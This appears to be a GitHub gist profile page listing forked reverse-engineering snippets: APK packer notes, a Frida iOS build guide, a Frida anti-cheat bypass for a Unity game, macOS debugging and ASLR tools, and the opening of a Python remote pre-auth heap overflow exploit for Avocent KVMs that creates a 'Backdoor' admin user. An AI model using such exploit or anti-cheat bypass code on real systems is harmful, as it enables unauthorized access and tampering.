ApkUnpacker apkunpacker

View GitHub Profile

Zimperium zShield RE Notes

Newer versions of the Rabbit R1's APK are protected by https://www.zimperium.com/zshield/ (I don't know this for certain; somebody told me it is, but I haven't really seen any identifying marks in the code yet).

Interesting assets within the APK:

- `lib/arm64-v8a/liboptipkawfn.so` (~3 MB): packed/encrypted ELF
- `assets/optipkawfn/0.odex` (only 41 bytes) (EDIT: I think this is part of an asset obfuscation scheme; the real file contents are likely elsewhere, inside the .szip maybe?)
- `assets/optipkawfn.szip` (~8 MB): I predict this contains encrypted + compressed bytecode
@apkunpacker
apkunpacker / guide.md
Created July 26, 2024 15:00 — forked from miticollo/guide.md
How to build Frida (≥ 16.2.2) for iOS jailbroken devices

Here, I'll show you how to compile Frida (≥ 16.2.2) for both rootful and rootless jailbreaks.

Old Instructions

If you want to compile an old version of Frida (< 16.2.2) you can use my old guide.

Build Instructions

Requirements

@apkunpacker
apkunpacker / index.ts
Created July 14, 2024 13:54 — forked from commonuserlol/index.ts
ACTk ObscuredTypes hax with frida; tested on 2.0.2
import "frida-il2cpp-bridge";

function main() {
    const AssemblyCSharp = Il2Cpp.domain.assembly("Assembly-CSharp").image;
    // Note that on versions older than 2.x.y this isn't needed,
    // since ACTk was bundled directly into Assembly-CSharp
    const ACTk_Runtime = Il2Cpp.domain.assembly("ACTk.Runtime").image;
    // Target class
    const PlayerData = AssemblyCSharp.class("PlayerData");

ELF Format Cheatsheet

Introduction

Executable and Linkable Format (ELF), is the default binary format on Linux-based systems.

ELF

Compilation

@apkunpacker
apkunpacker / asmpwn.py
Created December 9, 2023 06:59 — forked from aemmitt-ns/asmpwn.py
Remote pre-auth heap buffer overflow exploit for Avocent KVMs
import socket, struct, sys

p32 = lambda x: struct.pack(">I", x)
p16 = lambda x: struct.pack(">h", x)
p8 = lambda x: struct.pack(">b", x)

# ASMP heap overflow exploit creates new applianceAdmin user
def exploit(hostname, username="Backdoor", password="Backdoor"):
    global socks  # python closes out of scope sockets
    port = 3211  # this is hardcoded in the binary
    print(f"[*] Exploiting ASMP on {hostname} port {port}")
@apkunpacker
apkunpacker / load_wrapper.cc
Created November 22, 2023 02:12 — forked from singleghost2/load_wrapper.cc
Disable ASLR on macOS for dylibs, including those loaded with `dlopen`
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <spawn.h>
#include <sys/wait.h>
#include <string.h>
/* ASLR disabling magic constant from Apple LLDB source code
https://opensource.apple.com/source/lldb/lldb-76/tools/darwin-debug/darwin-debug.cpp
*/
@apkunpacker
apkunpacker / outline_graph.py
Created October 25, 2023 10:02 — forked from NyaMisty/outline_graph.py
IDA Graph view with outlined function included
"""
summary: drawing custom graphs
description:
Showing custom graphs, using `ida_graph.GraphViewer`. In addition,
show how to write actions that can be performed on those.
keywords: graph, actions
"""
from __future__ import print_function
# -----------------------------------------------------------------------
@apkunpacker
apkunpacker / CorePatchDetector.kt
Created August 3, 2023 16:11 — forked from 5ec1cff/CorePatchDetector.kt
CorePatch detector
package io.github.a13e300.demo.maho
import android.app.PendingIntent
import android.content.BroadcastReceiver
import android.content.Context
import android.content.Intent
import android.content.IntentFilter
import android.content.pm.PackageInstaller
import android.content.pm.PackageInstaller.EXTRA_STATUS
import android.content.pm.PackageInstaller.STATUS_PENDING_USER_ACTION
@apkunpacker
apkunpacker / example.txt
Created July 14, 2023 03:58 — forked from jevinskie/example.txt
xnu-unsuspend
jevin@wombat [22:32:18] [~/code/mac/widget/xnu_unsuspend] [main *]
-> % sudo taskinfo 'Deliveries Widget'
process: "Deliveries Widget" [30145] [unique ID: 1220404]
architecture: arm64
coalition (type 0) ID: 105936
coalition (type 1) ID: 591
suspend count: 1
virtual bytes: 389.40 GB; phys_footprint bytes: 8.92 MB; phys_footprint lifetime maximum bytes: 8.92 MB
run time: 42 s
user/system time (current threads): 0.046565 s / 0.036279 s
@apkunpacker
apkunpacker / add_debug_entitlement.sh
Created May 24, 2023 14:58 — forked from talaviram/add_debug_entitlement.sh
Simple Utility Script for allowing debug of hardened macOS apps.
#! /bin/bash
# Simple Utility Script for allowing debug of hardened macOS apps.
# This is useful mostly for plug-in developers who would like to keep developing without turning SIP off.
# Credit for idea goes to (McMartin): https://forum.juce.com/t/apple-gatekeeper-notarised-distributables/29952/57?u=ttg
# Update 2022-03-10: Based on Fabian's feedback, add capability to inject DYLD for sanitizers.
#
# Please note:
# - Modern Logic (on M1s) uses `AUHostingService`, which resides within the system and is thus not patchable; this REQUIRES turning off SIP.
# - Some hosts use separate plug-in scanning or sandboxing processes.
#   If that's the case, it's required to patch those (if needed) and attach the debugger to them instead.